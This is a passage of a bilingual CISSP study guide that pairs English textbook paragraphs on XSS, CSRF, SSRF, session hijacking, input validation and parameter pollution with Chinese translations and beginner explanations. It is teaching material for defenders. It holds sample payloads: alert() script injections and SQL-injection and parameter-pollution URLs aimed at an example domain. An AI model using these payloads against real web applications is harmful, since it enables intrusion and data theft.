However, you could be more malicious and include a more sophisticated script that asks the user to provide a password and transmits it to a malicious third party. At this point, you're probably asking yourself how anyone would fall victim to this type of attack. After all, you're not going to attack yourself by embedding scripts in the input that you provide to a web application that performs reflection. The key to this attack is that it's possible to embed form input in a link. A malicious individual could create a web page with a link titled “Check your account at First Bank” and encode form input in the link.

When the user visits the link, the web page appears to be an authentic First Bank website (because it is) with the proper address in the toolbar and a valid digital certificate. However, the website would then execute the script included in the input by the malicious user, which appears to be part of the valid web page. What's the answer to cross-site scripting? When creating web applications that allow any type of user input, developers must be sure to perform input validation. At the most basic level, applications should never allow a user to include the <SCRIPT> tag in a reflected input field.

However, this doesn't solve the problem completely; many clever alternatives are available to an industrious web application attacker. The best solution is to determine the type of input that the application will allow and then validate the input to ensure that it matches that pattern. For example, if an application has a text box that allows users to enter their age, it should accept only one to three digits as input. The application should reject any other input as invalid. For more examples of ways to evade cross-site scripting filters, see www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.

中文直译 / 整理

来欺骗毫无戒心的第三方。 如您所知,您可以通过使用HTML标签 <SCRIPT> 和 </ SCRIPT> 将脚本嵌入网页中。 假设您没有在姓名字段中输入 Mike,而是输入了以下文本: Mike<SCRIPT>alert('hello')</SCRIPT> 当Web应用程序以网页形式“反射”此输入时,您的浏览器会像处理其他任何 网页一样处理它:它显示网页的文本部分并执行脚本部分。 在这种情况下,脚 本只是打开一个弹出窗口,显示“hello”。 然而,您可能会更具恶意,包含一 个更复杂的脚本,要求用户提供密码并将其传输给恶意第三方。 此时,您可能在想,究竟会有人如何成为此类攻击的受害者。 毕竟,您不会通 过在提供给执行反射的Web应用程序的输入中嵌入脚本来攻击自己。 此类攻击 的关键在于,可以将表单输入嵌入到链接中。 恶意人员可以创建一个网页,其 中包含一个标题为“在第一银行检查您的账户”的链接,并在链接中编码表单 输入。 当用户访问该链接时,网页看起来像是一个真实的第一银行网站(因为 它确实是),工具栏中显示正确的地址并具有有效的数字证书。

然而,该网站 随后会执行恶意用户在输入中包含的脚本,而该脚本看起来像是有效网页的一 部分。 跨站脚本攻击的解决方案是什么? 在创建允许任何类型用户输入的网页应用时, 开发人员必须确保执行输入验证。 最基本的要求是,应用程序绝不能允许用户 在反射式输入字段中包含<SCRIPT> 标签。 然而,这并不能完全解决问题; 有多 种巧妙的替代方法可供有心的网页应用攻击者使用。 最佳解决方案是确定应用 程序将允许的输入类型,然后验证输入以确保其符合该模式。 例如,如果一个 应用程序有一个允许用户输入年龄的文本框,则应仅接受一到三位数字作为输 入。 应用程序应拒绝任何其他无效输入。 有关绕过跨站脚本过滤器的更多示例, see www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

程序:程序是一步一步怎么做。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

跨站脚本 XSS:XSS 把脚本注入到网页,让浏览器执行。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

证书不是密钥本身,而是身份与公钥的可信绑定。

输出编码、输入验证、CSP 可降低 XSS 风险。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
程序 程序是一步一步怎么做。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 40 / PDF P1434

第 1434 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Output encoding is a set of related techniques that take user-supplied input and encode it using a series of rules that transform potentially dangerous content into a safe form. For example, HTML encoding transforms the single quote (') character into the hexadecimal format encoded string '. Developers should be familiar with a variety of output encoding techniques, including HTML entity encoding, HTML attribute encoding, URL encoding, JavaScript encoding, and CSS hex encoding. For more information on these techniques, see the OWASP XSS Prevention Cheat Sheet at https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_P revention_Cheat_Sheet.html.

Stored/Persistent XSS Cross-site scripting attacks often exploit reflected input, but this isn't the only way that the attacks might take place. Another common technique is to store cross-site scripting code on a remote web server in an approach known as stored XSS. These attacks are described as persistent, because they remain on the server even when the attacker isn't actively waging an attack. As an example, consider a message board that allows users to post messages that contain HTML code. This is very common, because users may want to use HTML to add emphasis to their posts.

For example, a user might use this HTML code in a message board posting: <p>Hello everyone,</p> <p>I am planning an upcoming trip to <A HREF= 'https://www.mlb.com/mets/ballpark'>Citi Field</A> to see the Mets take on the Yankees in the Subway Series.</p> <p>Does anyone have suggestions for transportation? I am staying in Manhattan and am only interested in <B>public transportation</B> options.</p> <p>Thanks!</p> <p>Mike</p> When displayed in a browser, the HTML tags would alter the appearance of the message, as shown in Figure 21.6.

中文直译 / 整理

输出编码是一组相关技术,用于接收用户提供的输入,并使用一系列规则将其 编码,将潜在危险的内容转换为安全形式。 例如,HTML 编码将单引号字符 (') 转换为十六进制格式的编码字符串 '。 开发人员应熟悉多种输出编码技术, 包括 HTML 实体编码、HTML 属性编码、URL 编码、JavaScript 编码和 CSS 十六进制编码。 有关这些技术的更多信息,请参阅 OWASP 跨站脚本防护 速查表: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_P revention_Cheat_Sheet.html. 存储型/持久性XSS 跨站脚本攻击通常利用反射输入,但这并不是攻击发生的唯一方式。 另一种常 见技术是将跨站脚本代码存储在远程Web服务器上,这种方法被称为存储型 XSS。 这些攻击被称为持久性的,因为即使攻击者没有主动发动攻击,它们仍会 保留在服务器上。 举个例子,考虑一个允许用户发布包含HTML代码消息的留言板。 这非常常见, 因为用户可能希望使用HTML来强调他们的帖子。

例如,用户可能在留言板帖 子中使用以下HTML代码: < > < > < > p 大家好,/p p 我计划前往<A HREF= 'https://www.mlb.com/mets/ballpark'>Citi Field</A> 观看大都会队与洋基队在地铁系列 赛中的对决。 < > < > /p p 有人对交通有建议吗? 我住在 曼哈顿,只对<B>公共交通</B> 方式感兴趣。 </p><p>谢谢! </p><p>Mike</p> 当在浏览器中显示时,HTML 标签会改变消息的外观,如图 21.6所示。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

跨站脚本 XSS:XSS 把脚本注入到网页,让浏览器执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1434 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

输出编码、输入验证、CSP 可降低 XSS 风险。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 41 / PDF P1435

第 1435 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 21.6 Message board post rendered in a browser An attacker seeking to conduct a cross-site scripting attack could try to insert an HTML script in this code. For example, they might enter this code: <p>Hello everyone,</p> <p>I am planning an upcoming trip to <A HREF= 'https://www.mlb.com/mets/ballpark'>Citi Field</A> to see the Mets take on the Yankees in the Subway Series.</p> <p>Does anyone have suggestions for transportation?

I am staying in Manhattan and am only interested in <B>public transportation</B> options.</p> <p>Thanks!</p> <p>Mike</p> <SCRIPT>alert('Cross-site scripting!')</SCRIPT> When future users load this message, they would then see the alert pop-up shown in Figure 21.7. This is fairly innocuous, but an XSS attack could also be used to redirect users to a phishing site, request sensitive information, or perform another attack.

中文直译 / 整理

图 21.6 浏览器中显示的留言板帖子 试图进行跨站脚本攻击的攻击者可能会尝试在此代码中插入 HTML 脚本。 例如, 他们可能会输入以下代码: < > < > < > p 大家好,/p p 我计划前往 <A HREF= 'https://www.mlb.com/mets/ballpark'>Citi Field</A> 观看大都会队对阵洋基队的 Subway 系列比赛, y 系列比赛。 </p> <p>大家有什么交通建议吗? 我住在 曼哈顿并且只对 <B>公共交通</B> 方式感兴趣。 </p><p>谢谢! </p> < > < > < > pMike /p SCRIPT alert('Cross‑site scripting!')</SCRIPT> 当未来用户加载此消息时,他们将看到如图21.7所示的警告弹窗。 这相对无害, 但跨站脚本攻击(XSS)也可用于将用户重定向至钓鱼网站、请求敏感信息或 执行其他攻击。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

跨站脚本 XSS:XSS 把脚本注入到网页,让浏览器执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1435 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

输出编码、输入验证、CSP 可降低 XSS 风险。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 42 / PDF P1436

第 1436 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 21.7 XSS attack rendered in a browser Some XSS attacks are particularly sneaky and work by modifying the Document Object Model (DOM) environment within the user's browser. These attacks don't appear in the HTML code of the web page but are still quite dangerous. Request Forgery Request forgery attacks exploit trust relationships and attempt to have users unwittingly execute commands against a remote server. They come in two forms: cross-site request forgery and server-side request forgery.

Cross-Site Request Forgery (CSRF/XSRF) Cross-site request forgery attacks, abbreviated as XSRF or CSRF attacks, are similar to cross-site scripting attacks but exploit a different trust relationship. XSS attacks exploit the trust that a user has in a website to execute code on the user's computer. XSRF attacks exploit the trust that remote sites have in a user's system to execute commands on the user's behalf. XSRF attacks work by making the reasonable assumption that users are often logged into many different websites at the same time. Attackers then embed code in one website that sends a command to a second website. When the

中文直译 / 整理

图 21.7浏览器中呈现的 XSS 攻击 一些跨站脚本攻击(XSS)特别隐蔽,通过修改用户浏览器内的文档 对象模型(DOM)环境来实施。 这些攻击不会出现在网页的HTML代码 中,但仍具有相当大的危险性。 请求伪造 请求伪造 攻击利用信任关系,试图让用户在不知情的情况下向远程服务器执 行命令。 它们有两种形式:跨站请求伪造和服务器端请求伪造。 跨站请求伪造(CSRF/XSRF) 跨站请求伪造 攻击,简称为 XSRF 或 CSRF 攻击,与跨站脚本攻击相似,但利 用的是不同的信任关系。 XSS 攻击利用用户对网站的信任,在用户的计算机上 执行代码。 XSRF 攻击则利用远程网站对用户系统的信任,代表用户执行命令。 XSRF攻击利用了一个合理的假设:用户通常同时登录多个不同网站。 攻击者随 后在其中一个网站中嵌入代码,向第二个网站发送命令。 当

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

跨站脚本 XSS:XSS 把脚本注入到网页,让浏览器执行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1436 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

输出编码、输入验证、CSP 可降低 XSS 风险。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 43 / PDF P1437

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

user clicks the link on the first site, they are unknowingly sending a command to the second site. If the user happens to be logged into that second site, the command may succeed. Consider, for example, an online banking site. An attacker who wants to steal funds from user accounts might go to an online forum and post a message containing a link. That link actually goes directly into the money transfer site that issues a command to transfer funds to the attacker's account. The attacker then leaves the link posted on the forum and waits for an unsuspecting user to come along and click the link. If the user happens to be logged into the banking site, the transfer succeeds.

Developers should protect their web applications against XSRF attacks. One way to do this is to create web applications that use secure tokens that the attacker would not know to embed in the links. Another safeguard is for sites to check the referring URL in requests received from end users and only accept requests that originated from their own site. Server-Side Request Forgery (SSRF) Server-side request forgery (SSRF) attacks exploit a similar vulnerability, but instead of tricking a user's browser into visiting a URL, they trick a server into visiting a URL based on user-supplied input.

SSRF attacks are possible when a web application accepts URLs from a user as input and then retrieves information from that URL. If the server has access to non-public URLs, an SSRF attack can unintentionally disclose that information to an attacker. Session Hijacking Session hijacking attacks occur when a malicious individual intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user.

The following list includes some common techniques: Capturing details of the authentication between a client and server and using those details to assume the client's identity Tricking the client into thinking the attacker's system is the server, acting as the intermediary as the client sets up a legitimate connection with the server, and then disconnecting the client Accessing a web application using the cookie data of a user who did not properly close the connection or of a poorly designed application that

中文直译 / 整理

用户点击第一个网站上的链接时,他们无意中向第二个网站发送了命令。 如果 用户恰好登录了该第二个网站,该命令可能会成功。 例如,考虑一个在线银行网站。 一个想要窃取用户账户资金的攻击者可能会前 往一个在线论坛并发布一条包含链接的消息。 该链接实际上直接指向资金转账 网站,并发出将资金转账至攻击者账户的命令。 攻击者随后将该链接保留在论 坛上,等待不知情的用户点击该链接。 如果该用户恰好已登录银行网站,则转 账将成功执行。 开发者应保护其网络应用程序免受XSRF攻击。 一种方法是创建使用安全令牌 的网络应用程序,这些令牌是攻击者无法在链接中嵌入的。 另一种防护措施是 网站在接收来自最终用户的请求时检查引用URL,并且仅接受源自本网站的请 求。 服务器端请求伪造(SSRF) 服务器端请求伪造(SSRF)攻击利用了类似的漏洞,但并非诱骗用户浏览器访 问某个URL,而是诱骗服务器根据用户提供的输入访问某个URL。 当网络应用 程序接受用户提供的URL作为输入并从该URL检索信息时,SSRF攻击就可能发 生。 如果服务器可以访问非公开URL,则SSRF攻击可能无意中将该信息泄露给 攻击者。

会话劫持 会话劫持攻击发生在恶意个体截获授权用户与资源之间通信的部分后,使用劫 持技术接管会话并冒充授权用户的身份。 以下列表包含一些常见技术: 捕获客户端与服务器之间的认证细节,并利用这些细节冒充客户端身份 欺骗客户端,使其误认为攻击者的系统是服务器,在客户端与服务器建立 合法连接的过程中充当中介,然后断开客户端连接 使用未正确关闭连接的用户或设计不佳的应用程序的 Cookie 数据访问 Web 应用程序

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 44 / PDF P1438

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

does not properly manage authentication cookies All of these techniques can have disastrous results for the end user and must be addressed with both administrative controls (such as anti-replay authentication techniques) and application controls (such as expiring cookies within a reasonable period of time). Application Security Controls Although the many vulnerabilities affecting applications are a significant source of concern for cybersecurity professionals, the good news is that a number of tools are available to assist in the development of a defense-indepth approach to security.

Through a combination of secure coding practices and security infrastructure tools, cybersecurity professionals can build robust defenses against application exploits. Input Validation Cybersecurity professionals and application developers have several tools at their disposal to help protect against application vulnerabilities. The most important of these is input validation. Applications that allow user input should perform validation of that input to reduce the likelihood that it contains an attack. Improper input-handling practices can expose applications to injection attacks, cross-site scripting attacks, and other exploits.

The most effective form of input validation uses input whitelisting (also known as allow listing), in which the developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers. For example, if an input form prompts a user to enter their age, input whitelisting could verify that the user supplied an integer value within the range 0–123. The application would then reject any values outside that range.

中文直译 / 整理

未能正确管理身份验证 Cookie 所有这些技术都可能对最终用户造成灾难性后果,必须通过管理控制(如防重 放认证技术)和应用控制(如在合理时间内使 Cookie 过期)加以解决。 应用安全控制 尽管影响应用程序的众多漏洞是网络安全专业人员的重要关注点,但好消息是, 有多种工具可协助构建纵深防御的安全策略。 通过结合安全编码实践和安全基 础设施工具,网络安全专业人员可以构建强大的防御体系,以抵御应用程序漏 洞的利用。 输入验证 网络安全专业人员和应用程序开发人员拥有多种工具,可用于帮助防范应用程 序漏洞。 其中最重要的是 输入验证。 允许用户输入的应用程序应对输入进行验 证,以降低其包含攻击内容的可能性。 不当的输入处理实践可能导致应用程序 遭受注入攻击、跨站脚本攻击和其他漏洞利用。 最有效的输入验证形式是使用输入白名单(也称为允许列表),开发人员在此 方式中明确描述用户应提供的输入类型,然后在将输入传递给其他进程或服务 器之前,验证输入是否符合该规范。 例如,如果输入表单提示用户输入其年龄, 输入白名单可以验证用户提供的是否为0–123范围内的整数值。 应用程序将拒绝 该范围之外的任何值。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

纵深防御:纵深防御不是一道门,而是一层又一层控制。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

多层控制串联、避免单点失败,就是 defense in depth。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 45 / PDF P1439

第 1439 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

When performing input validation for security purposes, it is very important to ensure that validation occurs server-side rather than within the client's browser. Client-side validation is useful for providing users with feedback on their input, but it should never be relied on as a security control. It's easy for malicious actors and penetration testers to bypass browser-based input validation. It is often difficult to perform input whitelisting because of the nature of many fields that allow user input. For example, imagine a classified ad application that allows users to input the description of a product that they wish to list for sale.

It would be difficult to write logical rules that describe all valid submissions to that field that would also prevent the insertion of malicious code. In this case, developers might use input blacklisting (also known as block listing) to control user input. With this approach, developers do not try to explicitly describe acceptable input but instead describe potentially malicious input that must be blocked. For example, developers might restrict the use of HTML tags or SQL commands in user input. When performing input validation, developers must be mindful of the types of legitimate input that may appear in a field.

For example, completely disallowing the use of a single quote (') may be useful in protecting against SQL injection attacks, but it may also make it difficult to enter last names that include apostrophes, such as O'Reilly.

中文直译 / 整理

在进行安全目的的输入验证时,确保验证在服务器端而非客户端浏览器 中执行至关重要。 客户端验证有助于向用户提供输入反馈,但绝不能将其作 为安全控制手段依赖,因为恶意攻击者和渗透测试人员很容易绕过基于浏览 器的输入验证。 由于许多允许用户输入的字段的特性,执行输入白名单通常很困难。 例如,想 象一个分类广告应用程序,允许用户输入他们希望出售的产品描述。 要编写逻 辑规则来描述该字段所有有效的输入,同时防止恶意代码的插入,是非常困难 的。 在这种情况下,开发人员可能会使用输入黑名单(也称为阻断列表)来控 制用户输入。 采用这种方法时,开发人员不会尝试明确描述可接受的输入,而 是描述必须阻止的潜在恶意输入。 例如,开发人员可能会限制用户输入中使用 HTML标签或SQL命令。 在执行输入验证时,开发人员必须留意字段中可能出 现的合法输入类型。 例如,完全禁止使用单引号(')可能有助于防范SQL注入攻 击,但也可能导致难以输入包含撇号的姓氏,例如O'Reilly。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1439 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 46 / PDF P1440

第 1440 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Metacharacters Metacharacters are characters that have been assigned special programmatic meaning. Thus, they have special powers that standard, normal characters do not have. There are many common metacharacters, but typical examples include single and double quotation marks; the open/close square brackets; the backslash; the semicolon; the ampersand; the caret; the dollar sign; the period, or dot; the vertical bar, or pipe symbol; the question mark; the asterisk; the plus sign; open/close curly braces; and open/close parentheses: ' " [ ] \ ; & ^ $ . | ? * + { } ( ).

Escaping a metacharacter is the process of marking the metacharacter as merely a normal or common character, such as a letter or number, thus removing its special programmatic powers. This is often done by adding a backslash in front of the character (\&), but there are many ways to escape metacharacters based on the programming language or execution environment.

中文直译 / 整理

元字符 元字符是被赋予特殊程序含义的字符。 因此,它们具有标准普通字符所不 具备的特殊功能。 常见的元字符有很多,但典型示例包括单引号和双引号; 方括号的开闭符号; 反斜杠; 分号; 与号; 插入符号; 美元符号; 句点或 点号; 竖线或管道符号; 问号; 星号; 加号; 花括号的开闭符号; 以及圆 括号的开闭符号:' " [ ] \ ; & ^ $ . | ? * + { } ( ). 转义 元字符是指将元字符标记为普通字符(如字母或数字),从而移除其 特殊的程序功能。 这通常通过在字符前添加反斜杠来实现(\&),但根据 编程语言或执行环境的不同,转义元字符的方法有很多。

小白解释

场景先行:你是公司的安全负责人,正在读第 1440 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1440 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 47 / PDF P1441

第 1441 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Parameter Pollution Input validation techniques are the go-to standard for protecting against injection attacks. However, it's important to understand that attackers have historically discovered ways to bypass almost every form of security control. Parameter pollution is one technique that attackers have successfully used to defeat input validation controls. Parameter pollution works by sending a web application more than one value for the same input variable.

For example, a web application might have a variable named account that is specified in a URL like this: http://www.mycompany.com/status.php?account=12345 An attacker might try to exploit this application by injecting SQL code into the application: http://www.mycompany.com/status.php?account=12345'OR%201=1;-- However, this string looks quite suspicious to a web application firewall and would likely be blocked. An attacker seeking to obscure the attack and bypass content filtering mechanisms might instead send a command with two different values for account: http://www.mycompany.com/status.php?

account=12345&account=12345'OR%201=1;-- This approach relies on the premise that the web platform won't handle this URL properly. It might perform input validation on only the first argument but then execute the second argument, allowing the injection attack to slip through the filtering technology. Parameter pollution attacks depend on defects in web platforms that don't handle multiple copies of the same parameter properly. These vulnerabilities have been around for a while and most modern platforms are defended against them, but successful parameter pollution attacks still occur today due to unpatched systems or insecure custom code.

Web Application Firewalls Web application firewalls (WAFs) also play an important role in protecting web applications against attack. Developers should always build strong

中文直译 / 整理

